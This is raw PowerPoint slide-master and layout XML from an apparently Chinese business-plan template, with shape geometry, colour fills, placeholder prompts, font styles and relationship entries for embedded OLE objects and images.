    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46756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节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2854800" y="1234778"/>
            <a:ext cx="6480000" cy="5064114"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl2pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="5B76B5"/>
                </a:solidFill>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4" name="组合 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAE24F5B-6DC5-4749-AC1D-C29CB1A26254}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838200" y="5384492"/>
            <a:ext cx="1261641" cy="914400"/>
            <a:chOff x="8171726" y="1006998"/>
            <a:chExt cx="1261641" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="椭圆 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40E3D9BD-B1DE-4382-8B81-E2E96EBD8507}"/>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08F7B57-52F9-4975-873E-A65501815F2C}"/>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969B570-BE0A-4106-945B-6CE9D5ED04E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="7080203">
            <a:off x="10752694" y="1316699"/>
            <a:ext cx="569921" cy="413062"/>
            <a:chOff x="8171726" y="1006998"/>
            <a:chExt cx="1261641" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="椭圆 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7072116C-559E-4FC7-8E90-E746F089BABC}"/>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BDE54A8-6005-4896-8BAB-BDF173B6DE32}"/>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3690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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAE24F5B-6DC5-4749-AC1D-C29CB1A26254}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838200" y="5384492"/>
            <a:ext cx="1261641" cy="914400"/>
            <a:chOff x="8171726" y="1006998"/>
            <a:chExt cx="1261641" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="椭圆 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40E3D9BD-B1DE-4382-8B81-E2E96EBD8507}"/>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08F7B57-52F9-4975-873E-A65501815F2C}"/>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969B570-BE0A-4106-945B-6CE9D5ED04E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="7080203">
            <a:off x="10752694" y="1316699"/>
            <a:ext cx="569921" cy="413062"/>
            <a:chOff x="8171726" y="1006998"/>
            <a:chExt cx="1261641" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="椭圆 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7072116C-559E-4FC7-8E90-E746F089BABC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8171726" y="1006998"/>
              <a:ext cx="914400" cy="914400"/>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BDE54A8-6005-4896-8BAB-BDF173B6DE32}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9248172" y="1516284"/>
              <a:ext cx="185195" cy="185195"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="B3CBEA"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="B3CBE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0976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25C058B-4C1F-4AEF-A8A4-1FD84E30B5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椭圆 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3408AECA-1B3D-4B8C-814E-F1075D590F2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2489200" y="0"/>
            <a:ext cx="7213600"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983F552-C529-4045-BF7D-30E4A04AD5A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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8" name="任意多边形: 形状 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26DB1F72-E407-457D-A265-0338AA7979C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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2BDDC77A-4EBA-4F05-8FC3-DA13D5A52923}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="453429" y="2160000"/>
            <a:ext cx="11285141" cy="1354217"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="8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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="副标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E519CCF-A8A9-43CE-AF56-76A8CBD004DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3671999"/>
            <a:ext cx="9144000" cy="2016000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="4000" b="0" kern="0" spc="0" baseline="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单击编辑母版副标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="460971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1696DBF-68EF-4917-9405-0EA7989E74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4" t="7278" r="3104" b="7278"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="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5" name="椭圆 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F15F3AB2-A8C6-4A48-9D43-96794E727EA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2645229" y="0"/>
            <a:ext cx="6901542" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFFFFF"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="FFFF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3BA773AB-2767-4F8D-B936-47E6BB7276DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368152" y="4169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1B16A6D0-1571-4E86-B90C-0D376D3F6CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11328252" y="5420783"/>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rgbClr val="1B3B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框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C3FEBCD-95E3-40F8-80FB-8DE9CEEA181C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-104164" y="2007446"/>
            <a:ext cx="1012828" cy="153888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>BUSINESS PLAN</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="任意多边形: 形状 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF2BEF14-1FEB-48EF-AC28-1EC4761DA446}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11190952" y="0"/>
            <a:ext cx="1001049" cy="1074058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 53162 w 1001049"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1074058"/>
              <a:gd name="connsiteX1" fmla="*/ 1001049 w 1001049"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1074058"/>
              <a:gd name="connsiteX2" fmla="*/ 1001049 w 1001049"/>
              <a:gd name="connsiteY2" fmla="*/ 1046024 h 1074058"/>
              <a:gd name="connsiteX3" fmla="*/ 954809 w 1001049"/>
              <a:gd name="connsiteY3" fmla="*/ 1057913 h 1074058"/>
              <a:gd name="connsiteX4" fmla="*/ 794658 w 1001049"/>
              <a:gd name="connsiteY4" fmla="*/ 1074058 h 1074058"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 1001049"/>
              <a:gd name="connsiteY5" fmla="*/ 279400 h 1074058"/>
              <a:gd name="connsiteX6" fmla="*/ 16145 w 1001049"/>
              <a:gd name="connsiteY6" fmla="*/ 119249 h 107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49" h="1074058">
                <a:moveTo>
                  <a:pt x="53162" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1001049" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1001049" y="1046024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954809" y="1057913"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="903079" y="1068499"/>
                  <a:pt x="849518" y="1074058"/>
                  <a:pt x="794658" y="1074058"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="355781" y="1074058"/>
                  <a:pt x="0" y="718277"/>
                  <a:pt x="0" y="279400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="224540"/>
                  <a:pt x="5559" y="170979"/>
                  <a:pt x="16145" y="119249"/>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20" name="椭圆 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFA5A45C-6037-4997-AEEC-4D9A051EE49A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9256486" y="2044700"/>
            <a:ext cx="304800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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45号-冰宇雅宋" panose="00000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="字魂45号-冰宇雅宋" panose="00000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E3289C3-84A9-42B9-B757-C94B98394D08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1416000" y="2340000"/>
            <a:ext cx="9360000" cy="1080000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{438A8285-A011-492A-815D-56BA25BA1066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1776000" y="3600000"/>
            <a:ext cx="8640000" cy="14400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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1373444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3731A8-8456-47D9-AEDD-8D87F65D447E}"/>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22210" t="28773" r="28762" b="26563"/>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9" name="任意多边形: 形状 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B765F2B-4EF8-4683-AC24-7BF5F61802C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="208857" y="2918882"/>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任意多边形: 形状 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F248B03D-3831-46AC-9560-3DEDE1763197}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11487546" y="2918882"/>
            <a:ext cx="495596" cy="1020235"/>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46B0A2E-1307-413E-A25E-8D0B8DF90BFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428171" y="402971"/>
            <a:ext cx="11364685" cy="5947200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8376"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="330200" dist="139700" dir="5400000" algn="t"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spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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838200" y="540000"/>
            <a:ext cx="10515600" cy="648000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1260000"/>
            <a:ext cx="10515600" cy="5040000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="72000" tIns="72000" rIns="72000" bIns="7200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414406"/>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en-US" altLang="zh-CN"/>
              <a:t>2023/4/1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="6414406"/>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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="6410288"/>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106AEDA-D862-425F-9CE3-463C0651CF28}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386810808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72" r:id="rId4"/>
    <p:sldLayoutId id="2147483671" r:id="rId5"/>
    <p:sldLayoutId id="2147483664" r:id="rId6"/>
    <p:sldLayoutId id="2147483666" r:id="rId7"/>
    <p:sldLayoutId id="2147483649" r:id="rId8"/>
    <p:sldLayoutId id="2147483651" r:id="rId9"/>
    <p:sldLayoutId id="2147483652" r:id="rId10"/>
    <p:sldLayoutId id="2147483667" r:id="rId11"/>
    <p:sldLayoutId id="2147483668" r:id="rId12"/>
    <p:sldLayoutId id="2147483653" r:id="rId13"/>
    <p:sldLayoutId id="2147483669" r:id="rId14"/>
    <p:sldLayoutId id="2147483673" r:id="rId15"/>
  </p:sldLayoutIdLst>
  <p:hf sldNum="0" hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr lang="zh-CN" altLang="en-US" sz="4000" b="1" kern="120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cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="360000" indent="-360000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="125000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="Ø"/>
        <a:defRPr sz="2800" b="0" kern="1200">
          <a:solidFill>
            <a:srgbClr val="153B95"/>
          </a:solidFill>
          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="720000" indent="-360000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="125000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:buFont typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
        <a:buChar char="◆"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:srgbClr val="5B76B5"/>
          </a:solidFill>
          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1080000" indent="-360000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="125000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="ü"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:srgbClr val="153B95"/>
          </a:solidFill>
          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1440000" indent="-288000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="125000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:srgbClr val="5B76B5"/>
          </a:solidFill>
          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1800000" indent="-360000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="125000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="600"/>
        </a:spcBef>
        <a:buFont typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>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7.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webp"/></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oleObject" Target="../embeddings/oleObject10.bin"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject18.bin"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject13.bin"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject26.bin"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.wmf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject5.bin"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.wmf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject17.bin"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject25.bin"/><Relationship Id="rId38"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oleObject" Target="../embeddings/oleObject9.bin"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject12.bin"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject21.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24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject16.bin"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject24.bin"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject29.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject8.bin"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject15.bin"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject20.bin"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject28.bin"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.wmf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject11.bin"/><Relationship Id="rId31" 